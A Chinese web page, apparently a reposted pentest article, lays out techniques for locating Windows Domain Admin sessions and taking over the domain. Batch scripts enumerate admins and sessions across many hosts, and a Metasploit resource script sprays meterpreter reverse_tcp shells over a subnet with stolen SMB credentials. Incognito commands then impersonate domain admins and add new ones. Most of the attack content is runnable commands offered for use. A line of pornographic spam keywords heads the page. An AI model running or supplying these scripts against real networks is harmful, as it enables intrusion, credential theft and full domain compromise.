特黄特色三级在线观看免费,看黄色片子免费,色综合久,欧美在线视频看看,高潮胡言乱语对白刺激国产,伊人网成人,中文字幕亚洲一碰就硬老熟妇

學(xué)習(xí)啦>學(xué)習(xí)電腦>網(wǎng)絡(luò)知識>網(wǎng)絡(luò)技術(shù)>

關(guān)于域滲透技巧介紹

時間: 恒輝636 分享

域管理進(jìn)程轉(zhuǎn)移,使得滲透測試人員能夠模擬在互聯(lián)網(wǎng)上的域名管理員賬戶進(jìn)行操作。盡管如此,在滲透測試開始之前需要確認(rèn)系統(tǒng)中進(jìn)程是否運(yùn)行。在這篇博文中,我講介紹5個技巧來幫助大家去做這些事情。

本地檢測

查詢活躍的域控制器

掃描遠(yuǎn)程系統(tǒng)上運(yùn)行的任務(wù)

掃描遠(yuǎn)程系統(tǒng)上NetBIOS信息

PSExec掃描遠(yuǎn)程系統(tǒng)上的身份驗(yàn)證令牌

獲取域名管理員權(quán)限

在大多數(shù)情況下,本篇文章關(guān)注的焦點(diǎn)在于識別運(yùn)行于域名管理進(jìn)程的系統(tǒng)。

以下為大部分滲透測試人員獲取域名管理權(quán)限的過程

確定目標(biāo)系統(tǒng)和應(yīng)用程序

識別潛在的漏洞

利用漏洞獲得初始訪問

提升權(quán)限

定位域管理進(jìn)程或者獲取遠(yuǎn)程系統(tǒng)上的本地身份驗(yàn)證令牌

通過本地管理員的密碼Hash,解除密碼,使用mimikatz工具抓取密碼驗(yàn)證運(yùn)行在遠(yuǎn)程系統(tǒng)上的域名管理進(jìn)程

遷移域管理進(jìn)程

創(chuàng)建一個域管理員

整個過程在大多滲透測試社區(qū)中都有提到,如果你想了解更多詳情,可以通過Google找到許多指導(dǎo)書,技術(shù)文章,演示視頻。在本文中,我們注重的是前面提到的定位域管理進(jìn)程或者獲取遠(yuǎn)程系統(tǒng)上的本地身份驗(yàn)證令牌。

尋找域名管理進(jìn)程

下面開始講解我承諾給大家的5個技巧。

Technique 1:本地檢測

檢測目標(biāo)系統(tǒng)總是第一步,以下是一個使用本地命令檢測域管理進(jìn)程的簡單方法

運(yùn)行以下命令獲得域管理的列表:

net group “Domain Admins” /domain

運(yùn)行以下命令列出進(jìn)程和進(jìn)程所有者,賬戶運(yùn)行的進(jìn)程應(yīng)該第七欄

Tasklist /v

交叉引用的任務(wù)列表和域管理員列表

在目標(biāo)系統(tǒng)中,如果域管理進(jìn)程一開始就是可用的那就好辦了,但有時候,并非我們想的那么簡單。所以,接下來的4個技巧會幫你在遠(yuǎn)程域系統(tǒng)中找出域管理進(jìn)程。

Technique 2:查詢活躍的域名控制器

據(jù)我所知,這個技巧是由一個NetSPI造成的。我們需要一個方法去識別活躍域名管理進(jìn)程,或者是關(guān)閉IDS進(jìn)行一些掃描。最終它會出現(xiàn)一個簡單查詢域控制器,獲取活躍域用戶以及交叉引用域管理員列表。美中不足的是,你需要查詢所有的域控制器。下面我會提供一個基本步驟來獲取活躍域管理員。

使用LDAP查詢從 “Domain Controllers”單元收集域控制器的列表,或者使用一下命令

net group “Domain Controllers” /domain

重要提示:從單元中獲取到的域控制器的列表可信度十分高。但請記住,你應(yīng)該通過列舉信任域進(jìn)程并標(biāo)記這些域控制器。此外你也可以通過DNS查看

Nslookup –type=SRV _ldap._tcp.

使用LDAP查詢從”Domain Admins”獲取域管理員列表,或者使用下列命令

net group “Domain Admins” /domain

使用Netsess.exe查詢所有域控制器,獲取所有的活躍域。這是一款牛逼的工具,使用如下命令

Netsess.exe –h

交叉引用域管理員列表和活躍會話列表,來確認(rèn)哪個IP地址有活躍域令牌。在安全的環(huán)境下你可能需要等待域管理員或者含有權(quán)限的服務(wù)賬戶,然后在進(jìn)行活動。下面是一個快速使用Netsess的Windows命令行腳本,記住dcs.txt是一個域控制器列表admins.txt是一個域管理員列表。

FOR /F %i in (dcs.txt) do @echo [+] Querying DC %i && @netsess -h %i 2>nul > sessions.txt &&

FOR /F %a in (admins.txt) DO @type sessions.txt | @findstr /I %a

我寫了一個簡單的批處理腳本GDA,它可以使整個過程完全自動化,詳情可以看readme文件。在Mark Beard以及Ivan Dasilva的啟發(fā)下,我還創(chuàng)建了一個名為GDU的腳本進(jìn)行Windows字典攻擊。如果你感興趣,可以通過點(diǎn)擊上面的鏈接下載

Technique 3:掃描遠(yuǎn)程系統(tǒng)上運(yùn)行的任務(wù)

通常經(jīng)過前面兩個技巧的摧殘,大部分情況都能攻下了。然而,我在LaNMSteR53的博客上看到另外一種聰明的方法。如果你使用共享本地管理員帳戶運(yùn)行域系統(tǒng),你可以運(yùn)行下面的腳本掃描系統(tǒng)中的域管理任務(wù)。類似于前面提到的技巧,同樣首先需要列舉域管理員。下面的腳本包含,ips.txt目標(biāo)系統(tǒng)列表,names.txt域管理員列表。

FOR /F %i in (ips.txt) DO @echo [+] %i && @tasklist /V /S %i /U user /P password 2>NUL > output.txt &&

FOR /F %n in (names.txt) DO @type output.txt | findstr %n > NUL && echo [!] %n was found running a process on %i && pause

Technique 4:掃描遠(yuǎn)程系統(tǒng)上NetBIOS信息

一些Windows系統(tǒng)仍然允許用戶通過NetBIOS查詢已登錄用戶,同樣也可以使用原生的nbtstat工具進(jìn)行查詢

下面這個Windows命令行腳本將掃描遠(yuǎn)程系統(tǒng)活躍域管理會話。

for /F %i in (ips.txt) do @echo [+] Checking %i && nbtstat -A %i 2>NUL >nbsessions.txt && FOR /F %n in (admins.txt) DO @type nbsessions.txt | findstr /I %n > NUL && echo [!] %n was found logged into %i

你也可以使用nbtscan工具

for /F %i in (ips.txt) do @echo [+] Checking %i && nbtscan -f %i 2>NUL >nbsessions.txt && FOR /F %n in (admins.txt) DO @type nbsessions.txt | findstr /I %n > NUL && echo [!] %n was found logged into %i

Technique 5:PSExec掃描遠(yuǎn)程系統(tǒng)上的身份驗(yàn)證令牌

安裝Metasploit 3.5或更高版本

將下面腳本復(fù)制到一個文本文件并保存到Metasploit目錄,命名為psexec_spray.rc.

#Setup Multi Handler to accept multiple incoming connections use multi/handler setg PAYLOAD windows/meterpreter/reverse_tcp setg LHOST 0.0.0.0 setg LPORT 55555 set ExitOnSession false exploit -j -z

#Setup Credentials use windows/smb/psexec set SMBUser set SMBPass

#Setup Domain as local host unless using domain credentials set SMBDomain. #Disable playload handler in psexec modules (using multi handler) set DisablePayloadHandler true #Run Ruby code to scan desired network range using some REX API stuff - range walker #note: could also accept ip addresses from a file by replacing rhosts =”192.168.74.0/24” with rhosts = File.readlines(“c:systems.txt”) require 'rex/socket/range_walker' rhosts = "192.168.1.0/24" iplist = Rex::Socket::RangeWalker.new(rhosts) iplist.each do |rhost| #self allows for execution of commands in msfconsole self.run_single("set RHOST #{rhost}") #-j-z send the session to the background self.run_single("exploit -j -z") end

更新smbuser和smbpass參數(shù)

輸入以下命令運(yùn)行腳本,psexec_spray.rc腳本使用所提供的憑據(jù)在所有存在于192.168.1.0/24的系統(tǒng)中盲目安裝meterpreter shells

msfconsole –r psexec_spray.rc

你可以使用Metasploit的token_hunter模塊識別域管理令牌

創(chuàng)建一個包含域管理員列表的文件: COMPANYjoe-admin COMPANYbill-admin COMPANYdavid-admin

加載token_hunter模塊

msfconsole msf> load token_hunter

運(yùn)行token_hunter列出域管理令牌

msf> token_hunt_user -f /tmp/domain-admin.txt

另外,你可以使用下面的命令來獲得當(dāng)前登錄用戶的列表

Sessions –s loggedin

What Now?

如果你已經(jīng)有一個meterpreter會話,你可以用進(jìn)入隱身模式來冒充域管理員或者添加一個新的管理員。

在meterpreter會話中加載隱身模式

load incongnito

嘗試添加一個域管理員:

add_user -h

add_group ""Domain Admins"" -h

168406